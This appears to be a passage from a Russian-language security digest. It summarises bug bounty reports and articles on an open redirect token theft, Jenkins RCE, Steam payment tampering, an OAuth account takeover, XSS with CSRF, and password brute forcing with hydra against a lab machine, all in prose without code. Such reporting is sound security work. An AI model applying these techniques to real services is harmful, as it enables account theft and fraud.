💡 Организациям рекомендуется немедленно обновить Roundcube до последней версии и провести аудит безопасности своих почтовых серверов. Особое внимание следует уделить защите от XSS-атак и мониторингу подозрительной активности.

Кто бы мог подумать, что лишний пробел может открыть дверь для хакеров!

Автор: ptsecurity
Оценка: 9 — актуально и детально.

#cybersecurity #phishing #CVE #Roundcube

🔓🔍🔑 Кража токенов доступа пользователей через open redirect на Streamlabs

🚀 Тип уязвимости: Open Redirect
💰 Баунти: Неизвестно
📊 Критичность: Средняя

🕵️‍♂️ Анализ уязвимости
В отчете описывается уязвимость open redirect на сайте Streamlabs, которая позволяет злоумышленнику похитить токен доступа аутентифицированного пользователя. Уязвимость возникает из-за манипуляций с параметром перенаправления 'r' в глобальной точке идентификации. Злоумышленник может зарегистрировать доступный домен, такой как dragynslair.live, чтобы перехватывать токены доступа. Эти токены позволяют получить доступ к данным пользователей через API Streamlabs. Исследователь утверждает, что степень критичности должна быть выше, учитывая простоту эксплуатации и возможное влияние на конфиденциальность пользователей.

#OpenRedirect #Medium #Streamlabs

Подробный разбор репорта доступен по ссылке

🐞⚠️🖥 От чтения файлов до RCE: анализ CVE-2024-43044 в Jenkins

💡 В статье рассказывается об уязвимости CVE-2024-43044 в Jenkins, которая позволяет агентам читать произвольные файлы с контроллера и эскалировать привилегии до удалённого выполнения кода (RCE). Авторы подробно описывают, как злоумышленник может использовать эту уязвимость для обхода системы контроля доступа и захвата сервера Jenkins.

Статья тщательно анализирует архитектуру Jenkins и объясняет, как взаимодействие между контроллером и агентами может быть скомпрометировано. Особое внимание уделяется механизму загрузки JAR-файлов и тому, как недостатки в методе fetchJar позволяют получить доступ к файлам контроллера.

☝️ Интересно, что уязвимость позволяет обойти систему контроля доступа "Agent -> Controller", включенную по умолчанию с версии Jenkins 2.326. Это подчёркивает важность своевременного обновления систем и строгого контроля доступа между компонентами.

К тому же, авторы предоставляют детальный разбор эксплойта, показывая, как можно получить доступ к конфиденциальной информации и выполнить удалённый код на сервере. Это демонстрирует серьёзность уязвимости и необходимость принятия мер по её устранению.

🔥 Эксплойт использует различные подходы, включая получение куки "remember-me" для подделки сессии администратора и выполнение команд через консоль скриптов Jenkins. Данный пример подчёркивает важность защиты не только основных сервисов, но и вспомогательных компонентов, таких как агенты и каналы связи.

Автор: Adm1ngmz
Оценка: 9 - детальный и актуальный анализ

#cve #rce #jenkins

🔍🔓📚 Уязвимость: Доступ к любому курсу через перебор кодов

📂 Тип уязвимости: Information Disclosure
💰 Баунти: Неизвестно
⚠️ Критичность: Высокая

🕵️‍♂️ Анализ уязвимости
В отчете описана уязвимость на платформе Khan Academy, где с помощью Yahoo dorking можно получить доступ к кодам классов. Это позволяет без приглашения учителя записаться на любой курс. Используя специальный поисковой запрос, можно найти коды классов и создать учетную запись студента для присоединения к классу. Данная уязвимость приводит к несанкционированному доступу к курсам и потенциальному неправомерному использованию конфиденциальной информации учителей. Проблема классифицирована как Information Disclosure из-за доступности данных через поисковые системы. Попытки блокировать URL временно решают проблему, но требуется постоянное решение для предотвращения индексации.

#InformationDisclosure #High #KhanAcademy

Подробный разбор репорта доступен по ссылке

🛠️🔍🔓 process.binding() can bypass the permission model through path traversal

📂 Тип уязвимости: Path Traversal
💰 Баунти: Неизвестно
⚠️ Критичность: Высокая

🔍 Анализ уязвимости
В Node.js 20.x обнаружена уязвимость, связанная с устаревшим API `process.binding()`, которая позволяет обойти модель разрешений через обход путей. Это затрагивает пользователей, использующих экспериментальную модель разрешений в Node.js. Злоумышленник может манипулировать файловой системой, создавая несанкционированные директории, что позволяет обходить проверки безопасности, предназначенные для ограничения доступа и изменения файлов. Это представляет значительный риск безопасности, так как подрывает целостность модели разрешений.

#PathTraversal #High #Nodejs

Подробный разбор репорта доступен по ссылке

🔓🖥🔑 Брутфорс паролей на Kali GNU/Linux с hydra, medusa и ncrack: простое руководство

💡 В статье рассказывается о том, как установить, настроить и эксплуатировать уязвимую машину Metasploitable2-Linux в Kali GNU/Linux, используя инструменты для брутфорса hydra, medusa и ncrack.

Автор делится своим опытом взлома уязвимого хоста в виртуальной машине, подробно описывая каждый шаг от установки до эксплуатации. Статья содержит полезную информацию для начинающих специалистов в области информационной безопасности и пентестинга.

В первой части статьи подробно описывается установка и настройка виртуальной машины Metasploitable2-Linux в VirtualBox, включая настройку сети и необходимых параметров. Во второй части приводятся примеры использования утилит hydra, medusa и ncrack для проведения атак методом грубой силы на различные сервисы, такие как SSH, FTP и Telnet.

⚠️ Стоит отметить, что автор акцентирует внимание на законности использования подобных инструментов и предупреждает о возможных юридических последствиях нелегальных действий. Он рекомендует использовать уязвимую машину исключительно в образовательных целях и для тестирования.

🚀 Для тех, кто хочет погрузиться в практическое изучение методов пентестинга и освоить инструменты для брутфорса, эта статья может стать отличным отправным пунктом.

Автор: KoshelevGeorge1989
Оценка: 7/10. Полезно для начинающих пентестеров.

#hacking #infosec #bruteforce #virtualization

🎮💡🔍 Изменение в процессе передачи данных к платежному провайдеру Smart2Pay

🔍 Тип уязвимости: Business Logic Errors
💰 Баунти: 7500
⚠️ Критичность: Критическая

🕵️‍♂️ Анализ уязвимости
В отчёте описана критическая ошибка бизнес-логики, влияющая на метод оплаты Smart2Pay на платформе Steam. Манипулируя адресом электронной почты, связанным с аккаунтом Steam, и перехватывая POST-запрос к API Smart2Pay, злоумышленник мог изменить сумму транзакции без изменения хеша подписи. Это позволяло платить минимальную сумму, пока система обрабатывала более высокую сумму, что приводило к несанкционированному пополнению баланса Steam Wallet. Такая уязвимость могла серьёзно нарушить рынок Steam, позволяя злоумышленникам генерировать и продавать игровые ключи по более низким ценам, что влияло на доходы и стабильность рынка.

#BusinessLogicErrors #Critical #Steam

Подробный разбор репорта доступен по ссылке

🛡️🔓💥 UAF on JSEthereumProvider

🔍 Тип уязвимости: Use After Free
💰 Баунти: 3000.0 USD
🔥 Критичность: Критическая

🛠️ Анализ уязвимости
В отчёте выявлена критическая уязвимость Use After Free в JSEthereumProvider реализации Ethereum-кошелька браузера Brave. Уязвимость возникает при подключении кошелька и создании нового объекта ethereum. Ошибка находится в функции JSEthereumProvider::Install, где неправильно связывается объект callback, предполагая, что ethereum._metamask не может пережить ethereum. Уязвимость может быть использована для выполнения кода в процессе рендеринга путём удаления объекта ethereum и обращения к методу isUnlocked() на ethereum._metamask. Было предоставлено доказательство концепции (PoC), которое изначально имело проблемы, но затем было доработано для стабильного воспроизведения сбоя.

#UseAfterFree #Critical #Brave

Подробный разбор репорта доступен по ссылке

🛡🔒💥 Как невинные правила файрволов могут привести к проблемам безопасности

⚠️ В статье рассказывается о том, как простой запрос на изменение правил файрвола может обернуться серьезными проблемами безопасности. Автор рассматривает три трюка, которые разработчики могут использовать для обхода сетевых ограничений.

Статья подробно описывает возможные атаки и инструменты, которые злоумышленники могут применить при неосторожном открытии портов и доступов. Пошаговые примеры и детальные объяснения делают материал полезным для специалистов по информационной безопасности.

Стоит всегда помнить, что даже небольшие изменения в конфигурации безопасности могут иметь серьезные последствия. Взаимодействие между ИТ-отделом и службой безопасности должно быть тщательно продумано и контролируемо.

🚨 Без надлежащего контроля доступов внешние разработчики могут получить возможности, о которых вы даже не подозреваете. Поэтому важно не только технически реализовывать ограничения, но и понимать риски, связанные с человеческим фактором.

Никогда не думал, что простая просьба может обернуться такими проблемами!

Автор: Cloud4Y
Оценка: 8

#security #infosec #firewall #proxy

🛡️🔍🚫 Improper input validation in projects leads to fully deny access to project resources

🔒 Тип уязвимости: Improper Input Validation
💰 Баунти: Неизвестно
📊 Критичность: Средняя

📉 Анализ уязвимости
Отчет описывает уязвимость в функциях управления проектами в SEMrush, где неправильная проверка входных данных позволяет атакующему установить имя тега в null. Это вызывает критическую ошибку на стороне клиента, что приводит к полной потере доступа к ресурсам проекта для пользователей с затронутым тегом. Атакующий может воспользоваться этим, пригласив жертву в саботированный проект или имея права на редактирование в общем проекте, что приводит к отказу в обслуживании для жертвы без их участия. Это представляет значительный риск для бизнеса, полагающегося на SEMrush для управления проектами.

#ImproperInputValidation #Medium #SEMrush

Подробный разбор репорта доступен по ссылке

🕵️‍♂️🐞🎯 Секреты успешной охоты на баги: Полный гайд

🐞 В статье рассказывается о методологии баг-баунти для начинающих и опытных охотников за уязвимостями. Автор делится своим четырёхлетним опытом в сфере веб-хакинга и подробно описывает важные аспекты успешной работы в этой области.

Статья охватывает множество тем, включая инструменты, подходы и образ мышления хакера. Она будет особенно полезна тем, кто хочет структурировать свой подход к баг-баунти и повысить эффективность своих исследований.

📌 Особенно интересно было узнать о важности ведения заметок и использования автоматизации в процессе поиска багов. Также автор подчёркивает значимость правильного настроя и постоянного саморазвития.

💡 Не менее важно понимать, что баг-баунти — это не лёгкий способ быстро заработать, а навык, требующий времени и упорства. Новичкам стоит быть терпеливыми и настойчивыми, а опытным хакерам — продолжать совершенствоваться и делиться знаниями с сообществом.

🔥 Автор также раскрывает некоторые ошибки, которых стоит избегать, такие как попытки искать определённые паттерны уязвимостей вместо наблюдения за реакцией приложения. Он советует хакерам быть более наблюдательными и не ограничиваться стандартными подходами.

Автор: breakmirrors

Оценка: 9 — Подробно и полезно для всех уровней хакеров

#bugbounty #bughunting #hacking

🔑🔍🔓 Oauth Misconfiguration Lead To Account Takeover

⚠️ Тип уязвимости: Improper Authorization
💰 Баунти: Неизвестно
📊 Критичность: Средняя

🔎 Анализ уязвимости
В отчете выявлена уязвимость в конфигурации OAuth на reddit.com, позволяющая неавторизованным пользователям получить доступ к чужим аккаунтам. Злоумышленник может захватить аккаунт жертвы, войдя через Gmail жертвы, обходя методы верификации. Эта ошибка позволяет злоумышленникам эксплуатировать механизм OAuth, который должен разрешать доступ только при правильной аутентификации. Уязвимость серьезна, так как для захвата аккаунта требуется лишь адрес электронной почты жертвы, что может поставить под угрозу конфиденциальность и безопасность пользователей.

#ImproperAuthorization #Medium #Reddit

Подробный разбор репорта доступен по ссылке

🎯🛡🔍 Stored XSS + CSRF in "apellido" value

⚠️ Тип уязвимости: Stored Cross-Site Scripting (XSS) и Cross-Site Request Forgery (CSRF)
💰 Баунти: Неизвестно
📊 Критичность: Средняя

🧐 Анализ уязвимости
Отчет описывает уязвимость типа Stored XSS в сочетании с CSRF в поле 'apellido' формы. Злоумышленник может внедрить вредоносные скрипты, которые выполняются при доступе пользователя к затронутой странице. Эта уязвимость в комбинации с CSRF позволяет атакующему изменить адрес электронной почты жертвы, что потенциально ведет к захвату аккаунта. Влияние значительное, так как уязвимость обходит меры безопасности, такие как 'ck_oldpass'.

#XSS #Medium #Mars

Подробный разбор репорта доступен по ссылке